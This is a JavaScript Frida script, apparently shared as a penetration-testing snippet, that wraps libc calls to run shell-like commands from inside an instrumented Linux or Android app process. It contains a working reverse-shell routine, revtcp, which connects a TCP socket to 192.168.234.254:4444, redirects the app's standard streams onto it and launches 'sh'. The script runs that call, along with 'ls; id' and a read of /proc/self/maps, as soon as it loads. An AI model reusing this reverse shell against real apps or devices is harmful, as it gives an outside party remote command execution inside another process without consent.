Frida - Linux Shell From App Perspective (Tested on 32-bit...)
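/**
 * Thin wrappers around libc entry points, resolved through Frida's
 * `Module.findExportByName` and invoked through `NativeFunction`.
 *
 * Every wrapper resolves its symbol on each call (no caching); a failed lookup
 * is reported as an Error from `native()` rather than failing inside
 * NativeFunction. The Frida type strings are the ones the original script
 * used and several are narrower than the C prototypes (`read` returns
 * ssize_t and takes a size_t count, `htons` works on uint16_t) — adequate for
 * the small buffers used here, but keep it in mind before reusing them.
 *
 * All identifiers are declared (`const`) instead of being assigned as
 * implicit globals, so the script also works in strict mode.
 */
const libc = {
  library: 'libc.so',

  /**
   * Resolve `name` in `this.library` and wrap it as a NativeFunction.
   * @param {string} name - exported symbol name
   * @param {string} retType - Frida return type, e.g. 'int32' or 'pointer'
   * @param {string[]} argTypes - Frida argument types
   * @returns {NativeFunction}
   * @throws {Error} when the export is not found in `this.library`
   */
  native(name, retType, argTypes) {
    const address = Module.findExportByName(this.library, name);
    if (address === null) {
      throw new Error(`${name} not found in ${this.library}`);
    }
    return new NativeFunction(address, retType, argTypes);
  },

  /** system(3): run `command` via the shell; returns system()'s int result. */
  system(command) {
    const fn = this.native('system', 'int32', ['pointer']);
    return fn(Memory.allocUtf8String(command));
  },

  /** open(2): `mode` is passed as the flags argument; returns the fd or -1. */
  open(path, mode) {
    const fn = this.native('open', 'int32', ['pointer', 'int32']);
    return fn(Memory.allocUtf8String(path), mode);
  },

  /** read(2) into `buffer` (a NativePointer); returns the byte count, 0 or -1. */
  read(fd, buffer, nbyte) {
    const fn = this.native('read', 'int32', ['int32', 'pointer', 'int32']);
    return fn(fd, buffer, nbyte);
  },

  /** opendir(3); returns a DIR* (NULL pointer on failure). */
  opendir(directory) {
    const fn = this.native('opendir', 'pointer', ['pointer']);
    return fn(Memory.allocUtf8String(directory));
  },

  /** readdir(3); returns a struct dirent* (NULL pointer at end of stream). */
  readdir(DIR) {
    const fn = this.native('readdir', 'pointer', ['pointer']);
    return fn(DIR);
  },

  /**
   * pipe(2). Returns `{retval, fildes0, fildes1}`: fildes0 is the read end,
   * fildes1 the write end; both are only meaningful when retval is 0.
   */
  pipe() {
    const fildes = Memory.alloc(4 * 2); // int fildes[2]
    const fn = this.native('pipe', 'int32', ['pointer']);
    const retval = fn(fildes);
    return {
      retval,
      // Read each int as a 32-bit value at its own offset. The original
      // derived the second address via toInt32(), which truncates the
      // pointer on a 64-bit target.
      fildes0: Memory.readS32(fildes),
      fildes1: Memory.readS32(fildes.add(4)),
    };
  },

  /** dup2(2): make `fildes1` refer to the same file as `fildes0`. */
  dup2(fildes0, fildes1) {
    const fn = this.native('dup2', 'int32', ['int32', 'int32']);
    return fn(fildes0, fildes1);
  },

  /** dup(2): return a new descriptor for `fildes0`. */
  dup(fildes0) {
    const fn = this.native('dup', 'int32', ['int32']);
    return fn(fildes0);
  },

  /** close(2). */
  close(fildes) {
    const fn = this.native('close', 'int32', ['int32']);
    return fn(fildes);
  },

  /** fcntl(2) with a single int argument (e.g. F_SETFL with a flag word). */
  fcntl(fildes, cmd, args) {
    const fn = this.native('fcntl', 'int32', ['int32', 'int32', 'int32']);
    return fn(fildes, cmd, args);
  },

  /** socket(2). */
  socket(domain, type, protocol) {
    const fn = this.native('socket', 'int32', ['int32', 'int32', 'int32']);
    return fn(domain, type, protocol);
  },

  /** connect(2): `sa` is a NativePointer to a caller-built sockaddr. */
  connect(fd, sa, size) {
    const fn = this.native('connect', 'int32', ['int32', 'pointer', 'int32']);
    return fn(fd, sa, size);
  },

  /**
   * htons(3). Typed as uint32 in/out as in the original although the C
   * prototype is uint16_t; this worked on the 32-bit target the script was
   * tested on — confirm before relying on the upper half of the result.
   */
  htons(port) {
    const fn = this.native('htons', 'uint32', ['uint32']);
    return fn(port);
  },

  /** inet_addr(3): dotted-quad string to a network-order uint32. */
  inet_addr(address) {
    const fn = this.native('inet_addr', 'uint32', ['pointer']);
    return fn(Memory.allocUtf8String(address));
  },
};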
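/**
 * Decode `count` bytes from `buffer` the way the original script did: one JS
 * character per byte (Latin-1 style), with no UTF-8 decoding.
 * @param {NativePointer} buffer
 * @param {number} count
 * @returns {string}
 */
function bytesToString(buffer, count) {
  const bytes = new Uint8Array(Memory.readByteArray(buffer, count));
  let text = '';
  for (let i = 0; i < bytes.length; i++) {
    text += String.fromCharCode(bytes[i]);
  }
  return text;
}

/**
 * Read from `fd` in `bufferSize` chunks and console.log each chunk until
 * read(2) returns 0 or a negative value (EOF, an error, or EAGAIN on a
 * non-blocking descriptor). Does not close `fd`.
 * @param {number} fd
 * @param {number} bufferSize
 */
function printUntilDrained(fd, bufferSize) {
  const buffer = Memory.alloc(bufferSize);
  while (true) {
    const nbytes = libc.read(fd, buffer, bufferSize);
    if (nbytes <= 0) {
      return;
    }
    console.log(bytesToString(buffer, nbytes));
  }
}

/** Read chunk size shared by `shell.system` and `shell.cat`. */
const BUFSIZE = 4096;

/**
 * Shell-like helpers built on the `libc` wrappers, executed inside the
 * instrumented app's process.
 */
const shell = {
  /**
   * List the entries of `directory` by walking readdir(3) until it returns
   * NULL. d_name is read at a fixed offset of 19 bytes into struct dirent, as
   * in the original (the sum 4+4+2+4+4+1); that matches a
   * d_ino(8)+d_off(8)+d_reclen(2)+d_type(1) prefix — confirm against the
   * target libc's dirent layout before trusting the output elsewhere.
   * Note: `libc` has no closedir wrapper, so the DIR handle is not closed
   * (unchanged from the original).
   * @param {string} directory
   */
  ls(directory) {
    const D_NAME_OFFSET = 4 + 4 + 2 + 4 + 4 + 1;
    const dir = libc.opendir(directory);
    if (dir.isNull()) {
      console.log(`opendir(${directory}) failed`);
      return;
    }
    for (let entry = libc.readdir(dir); !entry.isNull(); entry = libc.readdir(dir)) {
      // entry.add() keeps the pointer width; the original went through
      // toInt32(), which only works on a 32-bit target.
      console.log(Memory.readUtf8String(entry.add(D_NAME_OFFSET)));
    }
  },

  /**
   * Run `command` with system(3) while the app's stdout and stderr (fds 1
   * and 2) are pointed at a pipe, then print what was written to it.
   *
   * The original descriptors are saved with dup(2) and restored afterwards;
   * the original script left fds 1/2 attached to a pipe whose read end it
   * had just closed, so the app's next write to stdout would have failed.
   *
   * Caveat (unchanged): system() is synchronous and the pipe is only drained
   * after it returns, so a command that writes more than the pipe buffer
   * holds before exiting blocks forever.
   * @param {string} command
   */
  system(command) {
    const F_SETFL = 4;
    const O_NONBLOCK = 2048; // 0o4000 on Linux; the original used decimal 4000
    const fds = libc.pipe();
    if (fds.retval !== 0) {
      console.log('pipe() failed');
      return;
    }
    const savedStdout = libc.dup(1);
    const savedStderr = libc.dup(2);
    libc.dup2(fds.fildes1, 1);
    libc.dup2(fds.fildes1, 2);
    // Non-blocking read end: the write end stays open through fds 1/2 while
    // we drain, so a blocking read would never see EOF.
    libc.fcntl(fds.fildes0, F_SETFL, O_NONBLOCK);
    try {
      libc.system(command);
      printUntilDrained(fds.fildes0, BUFSIZE);
    } finally {
      libc.dup2(savedStdout, 1);
      libc.dup2(savedStderr, 2);
      libc.close(savedStdout);
      libc.close(savedStderr);
      libc.close(fds.fildes0);
      libc.close(fds.fildes1);
    }
  },

  /**
   * Print the contents of `path`, opened with flags 0 (read-only).
   * The original read from `fds.fildes0` — the pipe descriptor left behind by
   * `system()` — instead of the file it had just opened; this reads from `fd`.
   * @param {string} path
   */
  cat(path) {
    const O_RDONLY = 0;
    const fd = libc.open(path, O_RDONLY);
    if (fd < 0) {
      console.log(`open(${path}) failed`);
      return;
    }
    try {
      printUntilDrained(fd, BUFSIZE);
    } finally {
      libc.close(fd);
    }
  },

  /**
   * Connect a TCP socket to host:port, dup2 it over the app's fds 0-2 and run
   * `sh` through system(3). Left as in the original: the sockaddr_in is built
   * by hand (layout below), pointer arithmetic goes through toInt32() and so
   * is 32-bit only, connect()'s result is not checked, the call blocks in
   * system() until the shell exits, and fds 0-2 are not restored afterwards.
   * Its observable footprint is one outbound TCP connection from the app
   * process followed by a `sh` child of that process.
   * @param {string} host - dotted-quad IPv4 address
   * @param {number} port
   */
  revtcp(host, port) {
    /* sa struct:
    short (2 bytes): sin_family
    ushort (2 bytes): sin_port
    int (4 bytes): sin_addr
    char[8](8 bytes): sin_zero*/
    const AF_INET = 0x0002;
    const SOCK_STREAM = 1;
    const sa_size = 2 + 2 + 4 + 8;
    const sa = Memory.alloc(sa_size);
    const p_sin_family = new NativePointer(sa.toInt32());
    Memory.writeShort(p_sin_family, AF_INET);
    const p_sin_port = new NativePointer(sa.toInt32() + 2);
    Memory.writeUShort(p_sin_port, libc.htons(port));
    const p_sin_addr = new NativePointer(sa.toInt32() + 2 + 2);
    Memory.writeU32(p_sin_addr, libc.inet_addr(host));
    // console.log(hexdump(sa,{length: 16}))
    const s = libc.socket(AF_INET, SOCK_STREAM, 0);
    libc.connect(s, sa, sa_size);
    libc.dup2(s, 0);
    libc.dup2(s, 1);
    libc.dup2(s, 2);
    libc.system('sh');
  },
};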
// Example invocations; all three run unconditionally as soon as the script is loaded.
shell.system('ls; id');
shell.cat('/proc/self/maps');
// Opens an outbound TCP connection from the app process to this host:port and then
// blocks in system('sh') until that shell exits; the app's fds 0-2 stay redirected.
shell.revtcp('192.168.234.254', 4444);